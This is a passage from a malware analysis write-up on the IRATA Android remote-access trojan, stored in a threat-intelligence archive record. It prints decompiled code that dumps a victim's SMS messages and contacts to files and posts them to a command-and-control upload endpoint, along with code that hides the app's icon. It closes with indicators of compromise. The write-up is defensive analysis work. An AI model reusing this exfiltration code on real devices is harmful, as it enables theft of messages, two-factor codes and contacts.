is OK\", 0);\r\n _hideapp(false);\r\n }\r\n if (_comand.equals(\"testphone\") \u0026\u0026 _android.equals(_androidid)) {\r\n _result1 = _rn.Check(RuntimePermissions.PERMISSION_SEND_SMS);\r\n _result2 = _rn.Check(RuntimePermissions.PERMISSION_READ_SMS);\r\n _result3 = _rn.Check(RuntimePermissions.PERMISSION_READ_CONTACTS);\r\n String str4 = \"result=ok\u0026action=testphone\u0026sendsms=\" + BA.ObjectToString(Boolean.valueOf(_result1)) +\r\n _data = str4;\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 18 of 23\n\n_ht._poststring(_apilink, str4);\r\n }\r\nThe malware wil send a command getsms to upload all SMS from victim’s phone. This ensure that if the\r\nmalware steals your credentials and has your SMS which contains 2 factor authentication 2FA then you are\r\nfucked.\r\nif (_comand.equals(\"getsms\") \u0026\u0026 _android.equals(_androidid)) {\r\n Common.LogImpl(\"83473500\", \"GetLastSms is OK\", 0);\r\n _li.Initialize();\r\n List GetAll = _sms2.GetAll();\r\n _li = GetAll;\r\n int size = GetAll.getSize();\r\n String str5 = \"\";\r\n for (int i = 0; i \u003c= size - 1; i++) {\r\n _sms = (SmsWrapper.Sms) _li.Get(i);\r\n StringBuilder sb = new StringBuilder();\r\n sb.append(str5);\r\n sb.append(Common.CRLF);\r\n sb.append(Common.CRLF);\r\n sb.append(\"{\");\r\n sb.append(Common.CRLF);\r\n sb.append(\"@The_Mammadw\");\r\n sb.append(Common.CRLF);\r\n sb.append(\"Conversion:\");\r\n sb.append(_sms.Address);\r\n sb.append(Common.CRLF);\r\n sb.append(\"Text:\");\r\n sb.append(_sms.Body);\r\n sb.append(Common.CRLF);\r\n sb.append(\"Date:\");\r\n DateTime dateTime = Common.DateTime;\r\n sb.append(DateTime.Date(_sms.Date));\r\n sb.append(\" \");\r\n DateTime dateTime2 = Common.DateTime;\r\n sb.append(DateTime.Time(_sms.Date));\r\n sb.append(Common.CRLF);\r\n sb.append(\"}\");\r\n str5 = sb.toString();\r\n }\r\n File file = Common.File;\r\n File file2 = Common.File;\r\n File.WriteString(File.getDirInternal(), \"AllSms.txt\", str5);\r\n File file3 = Common.File;\r\n _ht._postfile(_port1 + \"/upload.php?result=ok\u0026action=upload\u0026androidid=\" + _android + \"\u0026opr=\" + _opr\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 19 of 23\n\nThen the malware send the command getcontact to get all contacts of the victim to make new victims. After the\r\nmalware gets contacts, the malware will send spam SMS to the contacts to lure victims.\r\n if (_comand.equals(\"getcontact\") \u0026\u0026 _android.equals(_androidid)) {\r\n Common.LogImpl(\"83473516\", \"contact is OK\", 0);\r\n contactsutils contactsutilsVar = new contactsutils();\r\n contactsutilsVar._initialize(processBA);\r\n List _findcontactsbyphone = contactsutilsVar._findcontactsbyphone(\"\", false, false);\r\n int size2 = _findcontactsbyphone.getSize();\r\n String str6 = \"\";\r\n for (int i2 = 0; i2 \u003c size2; i2++) {\r\n List _getphones = contactsutilsVar._getphones(((contactsutils._cucontact) _findcontactsbyphone.G\r\n int size3 = _getphones.getSize();\r\n for (int i3 = 0; i3 \u003c size3; i3++) {\r\n contactsutils._cuphone _cuphoneVar = (contactsutils._cuphone) _getphones.Get(i3);\r\n str6 = str6 + Common.CRLF + \"@The_Mammadw\" + Common.CRLF + _cucontactVar.DisplayName + \": \"\r\n }\r\n }\r\n File file4 = Common.File;\r\n File file5 = Common.File;\r\n File.WriteString(File.getDirInternal(), \"Contacts.txt\", str6);\r\n File file6 = Common.File;\r\n _ht._postfile(_port1 + \"/upload.php?result=ok\u0026action=upload1\u0026androidid=\" + _android + \"\u0026opr=\" + _opr\r\n }\r\nThe malware will try to maintain presistance to the victim’s phone. So the victim won’t suspect about the installed\r\nAPK. So the malware will hide the icon of the malicious APK.\r\n public static String _hideapp(boolean z) throws Exception {\r\n Reflection reflection = new Reflection();\r\n B4AApplication b4AApplication = Common.Application;\r\n String packageName = B4AApplication.getPackageName();\r\n StringBuilder sb = new StringBuilder();\r\n B4AApplication b4AApplication2 = Common.Application;\r\n sb.append(B4AApplication.getPackageName());\r\n sb.append(\".main\");\r\n Object CreateObject2 = reflection.CreateObject2(\"android.content.ComponentName\", new Object[]{packageNam\r\n reflection.Target = reflection.GetContext(processBA);\r\n reflection.Target = reflection.RunMethod(\"getPackageManager\");\r\n reflection.Target = reflection.RunMethod4(\"setComponentEnabledSetting\", new Object[]{CreateObject2, Inte\r\n return \"\";\r\n }\r\nDynamic analysisPermalink\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 20 of 23\n\nNow we will try to run the malicious APK on android emulator using Android studio and intercept the http/s\r\nusing Burp Suite . After installing the malware.\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 21 of 23\n\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 22 of 23\n\nFigure(4)\r\nIoCPermalink\r\nNo. Description Hash and URLs\r\n1 The APK hash (MD5) ce41d55ee66d509e1e2043d9e238f65a\r\n2 C2 server hxxp:///usenlghusk.gq/USK/rat.php\r\n3 C2 Server hxxp://usenlghusk.gq/USK\r\nArticle QuotePermalink\r\nُه\r\nايا سالكني إليه الدرب ال تِقفوا .. طاَب الوصول لمحرومٍـ تم ّن\r\nREFPermalink\r\n1- IRATA\r\nSource: https://muha2xmad.github.io/malware-analysis/irata/\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://muha2xmad.github.io/malware-analysis/irata/"
	],
	"report_names": [
		"irata"
	],
	"threat_actors": [],
	"ts_created_at": 1775434468,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/893f0adbc9bc565d0dfe8621c7964f3ca488d65f.pdf",
		"text": "https://archive.orkl.eu/893f0adbc9bc565d0dfe8621c7964f3ca488d65f.txt",
		"img": "https://archive.orkl.eu/893f0adbc9bc565d0dfe8621c7964f3ca488d65f.jpg"
	}
}